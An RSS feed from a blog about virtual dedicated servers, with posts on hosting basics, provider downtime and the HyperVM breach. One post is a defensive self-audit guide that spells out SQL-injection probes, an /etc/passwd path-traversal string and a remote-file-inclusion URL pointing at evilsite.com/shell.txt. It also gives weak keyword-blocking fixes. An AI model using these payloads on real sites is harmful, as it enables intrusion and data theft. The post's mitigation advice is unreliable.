<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>UK VDS.com &#187; vds</title>
	<atom:link href="http://www.ukvds.com/tag/vds/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.ukvds.com</link>
	<description>ukvds.com is a blog about virtual dedicated servers</description>
	<lastBuildDate>Thu, 22 Jul 2010 15:44:50 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>VPS.net Downtime</title>
		<link>http://www.ukvds.com/12/vps-net-downtime/</link>
		<comments>http://www.ukvds.com/12/vps-net-downtime/#comments</comments>
		<pubDate>Tue, 01 Dec 2009 09:20:35 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[virtualization news]]></category>
		<category><![CDATA[vps]]></category>
		<category><![CDATA[vds]]></category>
		<category><![CDATA[vps.net]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=80</guid>
		<description><![CDATA[VPS.net appears to be suffering from repeated issues in the last month. Multiple SAN failures, Distributed Denial of Service attacks as well as other network related issues have brought much less less than 100% uptime in the last month with some users facing days of inaccessibility to their virtual servers.]]></description>
			<content:encoded><![CDATA[<p>VPS.net appears to be suffering from repeated issues in the last month. Multiple SAN failures, Distributed Denial of Service attacks as well as other network related issues have brought much less less than 100% uptime in the last month with some users facing days of inaccessibility to their virtual servers. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/12/vps-net-downtime/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What is a Virtual Server?</title>
		<link>http://www.ukvds.com/09/what-is-a-virtual-server/</link>
		<comments>http://www.ukvds.com/09/what-is-a-virtual-server/#comments</comments>
		<pubDate>Mon, 14 Sep 2009 16:08:19 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[vds]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=74</guid>
		<description><![CDATA[Virtual Dedicated Servers feature full root access. Running on highly powerful and reliable host systems, a VDS gives you the full flexibility of a dedicated at a lower cost &#8211; ideal for low-usage niche applications, monitoring systems and more. A VDS provides the full flexibility of a dedicated server &#8211; you are free to install [...]]]></description>
			<content:encoded><![CDATA[<p>Virtual Dedicated Servers feature full root access. Running on highly powerful and reliable host systems, a VDS gives you the full flexibility of a dedicated at a lower cost &#8211; ideal for low-usage niche applications, monitoring systems and more.</p>
<p>A VDS provides the full flexibility of a dedicated server &#8211; you are free to install your own software and configure the system to your exact needs as there are no other users &#8211; at just a fraction of the cost. They are perfect for development environments, simple applications, and sites which need the security of a dedicated server but don&#8217;t need the additional power.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/09/what-is-a-virtual-server/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Virtual Dedicated Server versus Reseller Hosting</title>
		<link>http://www.ukvds.com/08/virtual-dedicated-server-versus-reseller-hosting/</link>
		<comments>http://www.ukvds.com/08/virtual-dedicated-server-versus-reseller-hosting/#comments</comments>
		<pubDate>Sun, 30 Aug 2009 14:48:03 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[vds]]></category>
		<category><![CDATA[virtual server]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=72</guid>
		<description><![CDATA[A virtual dedicated server (VDS) is a virtual machine hosted on a physical dedicated server. There can be many virtual dedicated servers on a single physical dedicated server, and the beauty of this is that you get the flexibility of your own physical server without the cost. You are provided with the root login/administrator access [...]]]></description>
			<content:encoded><![CDATA[<p>A <a href="http://www.ukvds.com">virtual dedicated server (VDS)</a> is a <strong>virtual machine</strong> hosted on a physical dedicated server. There can be many virtual dedicated servers on a single physical dedicated server, and the beauty of this is that you get the flexibility of your own physical server without the cost.</p>
<p>You are provided with the root login/administrator access to the virtual dedicated server, in the same was as if it were a physical server. You can choose your operating system, (e.g. Linux CentOS, Windows Server 2003) and can install and configure your own software exactly to your own specifications. If you require a custom Apache configuration to host your website, you can do this.</p>
<p>Sometimes it is recommended that a user purchase a virtual dedicated server instead of a reseller package. With a Windows or Linux reseller hosting account, you are effectively free to resell a number of websites, based upon the amount of space/bandwidth you have purchased wholesale from your reseller hosting provider. This is especially suitable for a novice web hosting user, who need to host a number of websites but who doesn’t have the systems administration experience required to keep a virtual dedicated server running smoothly and securely. Additionally, a web designer who wishes to offer web hosting to their clients may benefit from a reseller hosting account – they want to offer website hosting to their clients but without the added problems of worrying about administering the server, making sure all of the scripts and server software is up to date etc.</p>
<p>So whilst a reseller account is very convenient, and cost effective for a user wishing to host a large number of websites, it doesn’t quite offer the flexibility of a virtual dedicated server, which may be more suited to a developer running multiple websites requiring custom Apache/MySQL/PHP/Ruby on Rails hosting requirements. In conclusion, for most users a reseller hosting account is usually the better option to take, whilst as a user gains more experience and understands the details of administering a linux hosting server, a VDS may be an option to progress to later on.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/08/virtual-dedicated-server-versus-reseller-hosting/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Website Security &amp; Securing your Server</title>
		<link>http://www.ukvds.com/08/website-security-securing-your-server/</link>
		<comments>http://www.ukvds.com/08/website-security-securing-your-server/#comments</comments>
		<pubDate>Mon, 10 Aug 2009 17:10:17 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[servers]]></category>
		<category><![CDATA[vds]]></category>
		<category><![CDATA[websites]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=49</guid>
		<description><![CDATA[Number 1, If you are using a common CMS Google it with the word exploit make sure your version is not listed Next try any Get Vars in your scripts and put a &#8216; at the end of them what I mean is you have = you add &#8216; so it&#8217;s yourwebsite.com/page?=&#8217; or any other [...]]]></description>
			<content:encoded><![CDATA[<p>Number 1, If you are using a common CMS Google it with the word exploit make sure your version is not listed</p>
<p>Next try any Get Vars in your scripts and put a &#8216; at the end of them what I mean is you have = you add &#8216; so it&#8217;s yourwebsite.com/page?=&#8217; or any other similar thing not only page= you may also try char(39) rather then only &#8216; most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments out the &#8216; but most PHP that only uses addslashes protection will still be vuln to SQL injection simply using char(39) which the php script will read as a single quote.<br />
If you get an error you might want to check the script.</p>
<p>The errors you may receive are mysql_* this is a sql injection get right on to fixing this because some one would have the ability of dumping your whole database, clients, admins, etc.</p>
<p>If the errors are main()or include_failed you may have just found an LFI (Local File Inclusion) OR RFI (Remote File Inclusion)&#8230;  If it is in a path like failed to include /test/file.ext ever then this is an LFI but is very useful to a hacker they have the ability to use. The following to browse into other places ../../../../ if they wanted to they&#8217;d view your passwd file via ../../../../../../etc/passwd</p>
<p>Well right now you&#8217;d say big Woop they got some users maybe not but  still have the ability to go to any forum on<br />
that server and upload an  avatar with PHP-EXIF data in it then include it. Using this LFI once they have done this it will execute the code written in this LFI meaning they have access to Run PHP-Code on your server now not good at all&#8230;</p>
<p>Recommendations fix the script have mod security block all  ../../../../../ to a certain point attempts.</p>
<p>Ok next were going to  discuss the abilities of an RFI and how to block it&#8230;<br />
So the things you can  do with an RFI well lets see remotely include an PHP file that will execute its  php file like so<br />
<a href="http://www.yoursite.com/file.php?file=evilsite.com/shell.txt" target="_blank">www.yoursite.com/file.php?file=evilsite.com/shell.txt</a>? this php file on your server would then remotely include the other file and execute the PHP code also allowing the user access to your server.</p>
<p>Prevention add http:// to your mod security this way when they  try remotely including a file in the URL httpd:// mod_security will block it.</p>
<p>Ok our next subject is XSS. What can XSS do XSS means cross site scripting a hacker can execute JavaScript code on your website using this some XSS is bad which would be called permanent XSS it allows users to embed their JavaScript inside something where you wouldn&#8217;t really see it&#8230; but when you clicked they could potentially grab your cookie or any current stored browser information. With this they could  use your cookie as their own to login as you&#8230; maybe even get password  information from this cookie.</p>
<p>As for SQL injection the way to block this is to&#8230; add &#8216; or /* to the mod security be sure to add in char(39) as it&#8217;s &#8216; in php and php will in fact read it from a URL and interpret it as &#8216; and still launch the sql injection.</p>
<p>One other thing you can do that is not exactly completely necessary but will help if any one does manage to get access to your website.Is you can encrypt all your db.php/conf.php/ files so that hackers cant read the information to gain access to your mysql database or gain any other passwords/usernames you might commonly use more then once.  You can do this by obfuscating the code using Zend or similar.</p>
<p>Finally, never leave any open upload scripts what so ever any open upload scripts left on your website will allow the hacker/attacker the ability to upload a file sure you can restrict them to only uploading JPG files or GIF,RAR etc.<br />
But the only problem with that is unless you customize your upload script to check for EXIF data and clear it out of an image when uploading it then the hacker still has something to use against you.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/08/website-security-securing-your-server/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>HyperVM &#8211; Virtual Server Management</title>
		<link>http://www.ukvds.com/06/hypervm-virtual-server-management/</link>
		<comments>http://www.ukvds.com/06/hypervm-virtual-server-management/#comments</comments>
		<pubDate>Fri, 12 Jun 2009 16:03:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[hypervm]]></category>
		<category><![CDATA[server management]]></category>
		<category><![CDATA[vds]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/hypervm-virtual-server-management/</guid>
		<description><![CDATA[HyperVM is a popular piece of software for managing nodes running virtual servers. Unfortunately, over the last few months it has become apparent that the software appears to be incredibly flawed. Security wise, there have been numerous critical vulnerability updates release. Any provider that was slow with their server updates will have found their systems [...]]]></description>
			<content:encoded><![CDATA[<p>HyperVM is a popular piece of software for managing nodes running virtual servers. Unfortunately, over the last few months it has become apparent that the software appears to be incredibly flawed. Security wise, there have been numerous critical vulnerability updates release. Any provider that was slow with their server updates will have found their systems extremely vulnerable to hacking.</p>
<p>Culminating in the recent hack of A2B2/Vaserv/FSCK VPS, where tens of thousands of websites were taken offline on multiple servers by exploiting a serious vulnerability in the HyperVM virtual machine management software.<br />
<a href="http://www.theregister.co.uk/2009/06/08/webhost_attack/" target="_blank">http://www.theregister.co.uk/2009/06/08/webhost_attack/</a></p>
<p>Whilst automation is an important detail of an efficient system &#8211; it is even more important to ensure that the integrity of that system is not compromised by implementing the automation. In this instance, a single installation of HyperVM with root access to many dozens of servers was compromised. It is important to consider worst case scenarios with any kind of service. What is the absolute worst that could happen to my system? What would be my nightmare?</p>
<p><strong>Think of your nightmare&#8230; and then multiply it a few times. Then make a contingency plan. </strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/06/hypervm-virtual-server-management/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What is a Virtual Dedicated Server?</title>
		<link>http://www.ukvds.com/04/what-is-a-virtual-dedicated-server/</link>
		<comments>http://www.ukvds.com/04/what-is-a-virtual-dedicated-server/#comments</comments>
		<pubDate>Mon, 20 Apr 2009 11:52:16 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[vps]]></category>
		<category><![CDATA[dedicated server]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[vds]]></category>

		<guid isPermaLink="false">http://www.ukvds.com/?p=5</guid>
		<description><![CDATA[A virtual dedicated server (VDS, also referred to as Virtual Private Server or VPS) is a method of partitioning a physical server computer into multiple &#8220;virtual&#8221; servers such that each has the appearance and capabilities of running on its own dedicated machine. Each virtual server can run its own full-fledged operating system, and each server [...]]]></description>
			<content:encoded><![CDATA[<p>A <strong>virtual dedicated server</strong> (VDS, also referred to as <strong>Virtual Private Server</strong> or VPS) is a method of partitioning a physical server computer into multiple &#8220;virtual&#8221; servers such that each has the appearance and capabilities of running on its own dedicated machine. Each virtual server can run its own full-fledged operating system, and each server can be independently controlled/rebooted/resized/migrated.</p>
<p>There are two kinds of virtualisation: software based and hardware based. In a software based virtual environment, the virtual machines share the same kernel and actually require the main node&#8217;s resources. This kind of virtualization normally has many benefits in a web hosting environment because of quota incrementing and decrementing in real time with no need to restart the node. The main examples are <a title="Xen" href="http://en.wikipedia.org/wiki/Xen">Xen</a>, <a class="mw-redirect" title="Virtuozzo" href="http://en.wikipedia.org/wiki/Virtuozzo">Virtuozzo</a>, <a class="mw-redirect" title="Vserver" href="http://en.wikipedia.org/wiki/Vserver">Vserver</a>, and <a title="OpenVZ" href="http://en.wikipedia.org/wiki/OpenVZ">OpenVZ</a> (which is the <a title="Open source" href="http://en.wikipedia.org/wiki/Open_source">open source</a> and development version of Parallels Virtuozzo Containers).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.ukvds.com/04/what-is-a-virtual-dedicated-server/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
